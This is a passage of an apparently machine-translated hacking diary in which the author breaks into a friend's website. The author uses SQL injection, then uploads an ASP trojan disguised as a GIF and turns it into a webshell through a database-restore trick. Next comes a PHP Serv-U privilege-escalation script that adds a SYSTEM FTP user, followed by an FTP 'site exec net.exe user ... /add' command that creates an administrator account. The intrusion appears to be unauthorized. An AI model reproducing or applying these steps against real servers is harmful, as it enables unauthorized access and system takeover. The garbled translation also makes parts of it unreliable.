Serv-u.php: The Light in the dark-vulnerability research

These days very boring, nothing to do, happened to a friend of a new website, let me go to see, by the way test the security of the site.
First look at the structure and layout of the site, feel the overall use of the whole station program, careful analysis of conjecture may be FreePower3.6, even more familiar, there is a forum is Leadbbs, "enemy" first check to this, start!
Tip: It's important to collect information before you invade, and it can help you decide the process of intrusion.
Through ping to the target site's IP, in IE to open this IP, but is another page, is estimated to be a virtual host. In Http://whois.webhosting.info this website inquires the IP address to bind 78 domain names, the good boy, really many ah, to other sites to turn, most is ASP site, has a small amount of PHP. Originally want to through other sites to cross station attack, but my level is not good, the foundation is not in prison, no way, change ideas.
This connection was first found on the website:
Http://www.xxxxx.com/Article_Show.asp?ArticleID=7
Feel a problem, with the addition of a semicolon, show the error page, replaced by the dot, the page normal display, indicating that there is a good chance of SQL injection vulnerabilities, using tools to inject it. Open NBSI2, fill in the address of the injection page, showing that the injection vulnerability has not been detected, and then write the ID in the signature character, detect again, show discovery vulnerabilities,
In turn, the user name and MD5 encryption password, run MD5 get the password is KIGNPL.
Because there is a ready-made admin address on the home page, it saves you the hassle of looking. Directly into the background, began to upload my ASP trojan, carefully look at each function, although upload file management can not use, but the article management to use. In the local first Haiyang 2005 version of the ASP Trojan renamed to GIF files, and then uploaded in the article management, prompted me to upload success after the file's relative address is "uploadfiles/2005-2/2005217193345303.gif", But how do I turn it into an ASP file, I jam again, depressed! Suddenly remember feather art in black defense introduced the use of Backup to restore the database method to deal with Dvbbs can not upload ASP files, just for me! Immediately find the database Management section, the GIF file I uploaded to restore the ASP file.
Trojan address is http://www.xxxxx.com/database/8.asp, finally a little sense of achievement, hehe. Login now my Lovely ASP trojan, get Webshell, roughly looked at the host information: Iis6.0,windows Server 2003, fortunately support FSO, I am happy to open the flowers-to know, this is my first time!
Small knowledge: FSO (file System Object) is a Microsoft ASP's control of the file operation, the control can read, create, modify, delete directories and file operations, is a very useful ASP programming a control.
Originally wanted to stop, but in the magazine to see others have elevated authority, I also come to join in the fun. After browsing for a while in the Webshell, I found that when I browsed the C disk of this site, I actually did the privilege limit
I didn't think there were only 3 disks on the mainframe, I can not browse its root directory, is limited to the site's home directory, jump up is not possible, and the administrator also banned WSH, because I am an Internet Guest account, only user permissions, so hold a gleam of hope to try Cmd, the results can not be implemented, It appears that the administrator has set up a Cmd.exe. No cmd, no WSH, directory does not execute the permissions of the program, how do I mix ah ...
With depressed mood, then try to upload, thought, you don't let me use cmd, I preach a go up! Still fail! The local Cmd.exe change the name into 1.gif upload, or not, change to HTM file, same no! Satisfied with the stuffy son. This seems to be what the program can not run! Really a little want to give up, can not write files, can not read the file outside the directory, the former masters of the method of how to die, the reverse connection is useless, not to mention the NC and Trojan.
Yes, we haven't checked the port yet! I hurriedly took out the Superscan scan port, the result let me this vegetable despair, opened only 21 and 389 ports, estimated the other side has the firewall or did the TCP/IP filtering filtering, 389 ports and unfamiliar, 21 is the FTP service default port, joins up to see banner how? Maybe it's serv-u?

Judging from the information returned, although it modifies the banner of the FTP server, the phrase "User name Okay,need password" can be boldly guessed that it is serv-u! Although its version I do not know now, but this may be a number of ways to success, try!
After careful thinking, there are now two ways to go: The first is through this IP on the other site to penetrate, I do not believe that 77 virtual hosts are so BT, should have some user rights can be large, but said easy to do difficult, all black on the next day I was a national treasure with two black eyes. The second is serv-u, is not open 21? So I picked up the ancestors of the long-range overflow attack weapons, take turns bombing, but others 21 positions as solid rock, despair ...
Back to think: The server is not supporting PHP script (this IP on the PHP site)? Although my permission is very small, but it is not useless, exe upload, to a PHP, who knows it can be a normal interpretation! Quickly upload a PHP trojan, but the permissions of the PHP Trojan is also very low, and ASP Trojan almost no useful permissions. But it inspires me: What if a PHP script can achieve Serv-u's local privilege elevation? Say dry on dry, I but can't php language, oneself make up is not, go to the internet to look for, unfortunately did not find suitable. Later put this idea with feather art said, he said he happened to have such a script, I take back a look to explain, this is not exactly what I want? Haha, it seems to be a go.
Quickly upload it to the web directory, the address is: http://www.xxxxx.com/database/servu.php, here I changed to servu.php. Run directly in IE.

We just add a superuser in Serv-u! Talk about its use: Host IP to provide the server address of the virtual host; host FTP management port to be modified according to the situation; Add username and password This is wofeiwo according to own preference, here is the default, the password is Wrsky; the directory of the head of household is generally c:\. Others are generally not required to be modified.
Okay, I modified the IP according to my situation, add the username and password, click the Add button, serv-u local Elevation permission script will be resolved on the server side of the execution, need some time, a bit slow, and so on after the scroll bar is executed successfully, will add a serv-u user Admim, The password is Admim, and its permission is system, the box has a command to perform the Echo, my echo is (see the following information basically executed successfully):
Serv-u FTP Server v5.2 for WinSock ready ...
331 User name Okay, need password.
230 User logged in, proceed.
230-switching to SYSTEM Maintenance mode.
230 Version=1
900-type=status
900 Server=online
900-type=license
900-daysleft=0
......
900 minorversion=0
200-user=admim
User Settings saved

Note here, because I have no way to view the firewall (if any) after the real port (if there is) open the true ports (technology is too bad, hehe), so I assume that its local serv-u management port has not been modified, a bit of a taste. Ha ha! It worked! Is Serv-u 5.2, even the version is displayed! The result is fluke!
Now the situation is clear: direct FTP past login, switch directories to System32, and then execute the following command to add the user "Mdj:quote site exec net.exe user mdj 123456/add"
What's going on? Prompt me to execute failure:
Ftp> Quote site exec net.exe user Mdj 123456/add
501 Cannot EXEC command line (error=0)
Think for a moment, since Net.exe exists to explain that the administrator may have access to the net file, test cmd is the same. So I'll upload the Net.exe, rename it to 200.exe, and then execute the Add Admin user command.
Command execution succeeded! Description has system administrator's privileges! can use Serv-u for remote management, upload-free Trojan and so on. Everyone is an expert, vegetable I here will not nonsense, infiltration to here is over.
serv-u.php for all serv-u versions, the local privilege elevation tool, I was a small user privilege, which is visible in this infiltration process played a crucial role. Now some servers are still allowed to execute the program, such a upload an upgrade serv-u permissions exe on everything! But if you're in a Web test like me or something like that, try this script, there's a surprise! Finally, thank Yu Yi Brother's strong support!